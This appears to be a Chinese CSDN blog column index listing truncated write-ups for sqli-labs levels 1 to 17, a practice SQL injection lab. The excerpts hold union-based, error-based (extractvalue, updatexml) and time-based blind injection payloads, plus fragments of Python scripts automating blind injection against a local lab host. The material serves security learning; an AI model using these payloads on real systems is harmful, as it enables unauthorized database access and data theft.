![](https://img-blog.csdnimg.cn/2020121514365469.jpg?x-oss-process=image/resize,m_fixed,h_224,w_224)
安全学习之Sqli-Labs
安全学习之Sqli-Labs
H3rmesk1t
记录一下平时遇到的问题和学习的东西
展开
-
less-17 in sqli-labs
Less-17 报错注入【 ’ 】 通过判断发现注入点存在于passwd处(在uname处\无反应,passwd处\有报错) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin'' at line 1 爆当前库名:1' and extractvalue(1,concat(0x7e,原创 2021-02-17 18:35:18 · 99 阅读 · 0 评论 -
less-16 in sqli-labs
Less-16 延时注入【 " 】 自动注入脚本 import requests import datetime MAXLENGTH = 20 url = "http://sqli-labs:8080/Less-16/" def getLengthOfDatabase(): for num in range(1,MAXLENGTH): payload = "admin\") and if(length(database())=%s,sleep(2),1)#" % num原创 2021-02-17 14:13:21 · 108 阅读 · 0 评论 -
less-15 in sqli-labs
Less-15 延时注入【 ’ 】 自动注入脚本 import requests import datetime MAXLENGTH = 20 url = "http://sqli-labs:8080/Less-15/" def getLengthOfDatabase(): for num in range(1,MAXLENGTH): payload = "admin' and if(length(database())=%s,sleep(2),1)#" % num原创 2021-02-17 14:01:47 · 85 阅读 · 1 评论 -
less-14 in sqli-labs
Less-14 报错注入【 " 】 1、注入点判断:uname=admin\&passwd=Dumb You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Dumb" LIMIT 0,1' at line 1 updataxml版本 2、进行报错注入得到数据库名:uname=admin原创 2021-01-24 22:39:52 · 153 阅读 · 0 评论 -
less-13 in sqli-labs
Less-13 报错注入【 ') 】 1、注入点判断:uname=admin\&passwd=Dumb You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Dumb') LIMIT 0,1' at line 1 updataxml版本 2、进行报错注入得到数据库名:uname=adm原创 2021-01-24 22:20:48 · 101 阅读 · 0 评论 -
less-12 in sqli-labs
Less-12 联合查询[ ") ]原创 2020-12-17 00:22:42 · 151 阅读 · 0 评论 -
less-11 in sqli-labs
Less-11 联合查询[ ’ ]原创 2020-12-17 00:14:00 · 107 阅读 · 0 评论 -
less-10 in sqli-labs
Less-10 延迟注入[ ” ] 先进行注入点的测试,发现试过很多回显都是一样的,当尝试到?id=1" and sleep(5) --+,发现页面在迟缓后有回显,猜测是基于"的时间盲注,盲注脚本和less-9基本一样,改下url就行。 解题脚本 # less-9 url = "http://sqli-labs:8080/Less-9/?id=1' " # less-10 url = "http://sqli-labs:8080/Less-9/?id=1" " import req原创 2020-12-16 23:49:49 · 121 阅读 · 0 评论 -
less-9 in sqli-labs
Less-9 延迟注入[ ’ ] 先进行注入点的测试,发现试过很多回显都是一样的,当尝试到?id=1%27%20and%20sleep(5)%20--+,发现页面在迟缓后有回显,猜测是基于’的时间盲注 解题脚本 import requests import time import datetime MAXLENGTH = 20 url = "http://sqli-labs:8080/Less-9/?id=1%27 " def getLengthOfDatabase(): for num in原创 2020-12-16 23:37:43 · 129 阅读 · 0 评论 -
less-2 in sqli-labs
Less-2 联合查询[ ] 查看返回多少列 http://sqli-labs:8080/Less-2/?id=1%20order%20by%204%20--+ Unknown column '4' in 'order clause' http://sqli-labs:8080/Less-2/?id=1%20order%20by%203%20--+ Your Login name:Dumb Your Password:Dumb # 返回3列 查看显位 http://sqli-labs:8080/Les原创 2020-12-15 19:35:05 · 101 阅读 · 0 评论 -
less-8 in sqli-labs
模拟ctf的sql注入我自己在数据库中添加了flag字段 盲注脚本 import requests import string # 判断数据库的长度 punctuation = string.punctuation digits = string.digits ascii_letters = string.ascii_letters compare_str = ascii_letters + digits + punctuation url = "http://sqli-labs:8080/Less-8/?原创 2020-12-15 14:40:17 · 98 阅读 · 0 评论 -
less-1 in sqli-labs
Less-1 联合查询[ ’ ] 查看返回了多少列 http://sqli-labs:8080/Less-1/?id=1%27%20order%20by%204%20--+ Unknown column '4' in 'order clause' http://sqli-labs:8080/Less-1/?id=1%27%20order%20by%203%20--+ Your Login name:Dumb Your Password:Dumb # 返回3列 查看显位 http://sqli-labs原创 2020-12-15 19:23:41 · 91 阅读 · 0 评论 -
less-5 in sqli-labs
less-5 用extractvalue报错注入 ?id=1' --+ You are in........... #无有用信息 考虑报错注入 ?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+ XPATH syntax error: '~security~' ?id=1' and extractvalue(1,concat(0x7e,(select table_name from information_s原创 2020-12-06 21:30:11 · 79 阅读 · 0 评论